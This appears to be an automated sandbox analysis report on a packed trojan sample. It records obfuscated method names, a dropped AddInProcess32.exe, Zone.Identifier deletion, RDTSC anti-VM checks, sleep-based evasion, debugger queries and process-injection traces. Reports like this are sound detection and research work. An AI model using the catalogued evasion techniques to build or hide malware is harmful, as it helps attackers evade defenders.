Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Fs7/k3S.cs	High entropy of concatenated method names: '.ctor', 'Rc8', 'Pp8', 'g2Z', 'w2Z', 'Cg3', 'e8H', 'Xn9', 'Fx2', 'Yy2'
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Lk46/Tn40.cs	High entropy of concatenated method names: '.ctor', 'p2EP', 'Kx1s', 'Ab5a', 'Xf51', 'z6MZ', 'Yf2j', 'd0SN', 'Zd3y', 'z3C9'
Source: 1.0.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Fs7/k3S.cs	High entropy of concatenated method names: '.ctor', 'Rc8', 'Pp8', 'g2Z', 'w2Z', 'Cg3', 'e8H', 'Xn9', 'Fx2', 'Yy2'
Source: 1.0.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Lk46/Tn40.cs	High entropy of concatenated method names: '.ctor', 'p2EP', 'Kx1s', 'Ab5a', 'Xf51', 'z6MZ', 'Yf2j', 'd0SN', 'Zd3y', 'z3C9'
Source: 1.2.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Fs7/k3S.cs	High entropy of concatenated method names: '.ctor', 'Rc8', 'Pp8', 'g2Z', 'w2Z', 'Cg3', 'e8H', 'Xn9', 'Fx2', 'Yy2'
Source: 1.2.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Lk46/Tn40.cs	High entropy of concatenated method names: '.ctor', 'p2EP', 'Kx1s', 'Ab5a', 'Xf51', 'z6MZ', 'Yf2j', 'd0SN', 'Zd3y', 'z3C9'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

File opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000002CC85E4 second address: 0000000002CC85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000002CC896E second address: 0000000002CC8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 11_2_004088A0 rdtsc

11_2_004088A0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Window / User API: threadDelayed 1457			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Window / User API: threadDelayed 8364			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 7088	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 6188	Thread sleep count: 1457 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 6188	Thread sleep count: 8364 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 7088	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000C.00000000.753250873.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.749612554.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.753250873.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Binary or memory string: Dk/mhgfsdcb
Source: explorer.exe, 0000000C.00000000.753725854.000000000A897000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 0000000C.00000000.745317933.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000C.00000000.753363013.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000C.00000000.745317933.0000000004710000.00000004.00000001.sdmp	Binary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
Source: explorer.exe, 0000000C.00000000.753421998.000000000A782000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 0000000C.00000000.753849271.000000000A9A2000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 11_2_004088A0 rdtsc

11_2_004088A0

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 11_2_00409B10 LdrLoadDll,

11_2_00409B10

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BB171 mov eax, dword ptr fs:[00000030h]	11_2_017BB171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BB171 mov eax, dword ptr fs:[00000030h]	11_2_017BB171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BC962 mov eax, dword ptr fs:[00000030h]	11_2_017BC962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018749A4 mov eax, dword ptr fs:[00000030h]	11_2_018749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018749A4 mov eax, dword ptr fs:[00000030h]	11_2_018749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018749A4 mov eax, dword ptr fs:[00000030h]	11_2_018749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018749A4 mov eax, dword ptr fs:[00000030h]	11_2_018749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018369A6 mov eax, dword ptr fs:[00000030h]	11_2_018369A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DB944 mov eax, dword ptr fs:[00000030h]	11_2_017DB944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DB944 mov eax, dword ptr fs:[00000030h]	11_2_017DB944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018351BE mov eax, dword ptr fs:[00000030h]	11_2_018351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018351BE mov eax, dword ptr fs:[00000030h]	11_2_018351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018351BE mov eax, dword ptr fs:[00000030h]	11_2_018351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018351BE mov eax, dword ptr fs:[00000030h]	11_2_018351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E513A mov eax, dword ptr fs:[00000030h]	11_2_017E513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E513A mov eax, dword ptr fs:[00000030h]	11_2_017E513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D4120 mov eax, dword ptr fs:[00000030h]	11_2_017D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D4120 mov eax, dword ptr fs:[00000030h]	11_2_017D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D4120 mov eax, dword ptr fs:[00000030h]	11_2_017D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D4120 mov eax, dword ptr fs:[00000030h]	11_2_017D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D4120 mov ecx, dword ptr fs:[00000030h]	11_2_017D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018441E8 mov eax, dword ptr fs:[00000030h]	11_2_018441E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9100 mov eax, dword ptr fs:[00000030h]	11_2_017B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9100 mov eax, dword ptr fs:[00000030h]	11_2_017B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9100 mov eax, dword ptr fs:[00000030h]	11_2_017B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BB1E1 mov eax, dword ptr fs:[00000030h]	11_2_017BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BB1E1 mov eax, dword ptr fs:[00000030h]	11_2_017BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BB1E1 mov eax, dword ptr fs:[00000030h]	11_2_017BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E61A0 mov eax, dword ptr fs:[00000030h]	11_2_017E61A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E61A0 mov eax, dword ptr fs:[00000030h]	11_2_017E61A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2990 mov eax, dword ptr fs:[00000030h]	11_2_017E2990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EA185 mov eax, dword ptr fs:[00000030h]	11_2_017EA185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DC182 mov eax, dword ptr fs:[00000030h]	11_2_017DC182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01833884 mov eax, dword ptr fs:[00000030h]	11_2_01833884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01833884 mov eax, dword ptr fs:[00000030h]	11_2_01833884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D0050 mov eax, dword ptr fs:[00000030h]	11_2_017D0050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D0050 mov eax, dword ptr fs:[00000030h]	11_2_017D0050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA830 mov eax, dword ptr fs:[00000030h]	11_2_017DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA830 mov eax, dword ptr fs:[00000030h]	11_2_017DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA830 mov eax, dword ptr fs:[00000030h]	11_2_017DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA830 mov eax, dword ptr fs:[00000030h]	11_2_017DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E002D mov eax, dword ptr fs:[00000030h]	11_2_017E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E002D mov eax, dword ptr fs:[00000030h]	11_2_017E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E002D mov eax, dword ptr fs:[00000030h]	11_2_017E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E002D mov eax, dword ptr fs:[00000030h]	11_2_017E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E002D mov eax, dword ptr fs:[00000030h]	11_2_017E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]	11_2_0184B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184B8D0 mov ecx, dword ptr fs:[00000030h]	11_2_0184B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]	11_2_0184B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]	11_2_0184B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]	11_2_0184B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]	11_2_0184B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]	11_2_017CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]	11_2_017CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]	11_2_017CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]	11_2_017CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01837016 mov eax, dword ptr fs:[00000030h]	11_2_01837016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01837016 mov eax, dword ptr fs:[00000030h]	11_2_01837016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01837016 mov eax, dword ptr fs:[00000030h]	11_2_01837016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B58EC mov eax, dword ptr fs:[00000030h]	11_2_017B58EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B40E1 mov eax, dword ptr fs:[00000030h]	11_2_017B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B40E1 mov eax, dword ptr fs:[00000030h]	11_2_017B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B40E1 mov eax, dword ptr fs:[00000030h]	11_2_017B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01884015 mov eax, dword ptr fs:[00000030h]	11_2_01884015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01884015 mov eax, dword ptr fs:[00000030h]	11_2_01884015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EF0BF mov ecx, dword ptr fs:[00000030h]	11_2_017EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EF0BF mov eax, dword ptr fs:[00000030h]	11_2_017EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EF0BF mov eax, dword ptr fs:[00000030h]	11_2_017EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F90AF mov eax, dword ptr fs:[00000030h]	11_2_017F90AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01872073 mov eax, dword ptr fs:[00000030h]	11_2_01872073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9080 mov eax, dword ptr fs:[00000030h]	11_2_017B9080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01881074 mov eax, dword ptr fs:[00000030h]	11_2_01881074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E3B7A mov eax, dword ptr fs:[00000030h]	11_2_017E3B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E3B7A mov eax, dword ptr fs:[00000030h]	11_2_017E3B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0186D380 mov ecx, dword ptr fs:[00000030h]	11_2_0186D380
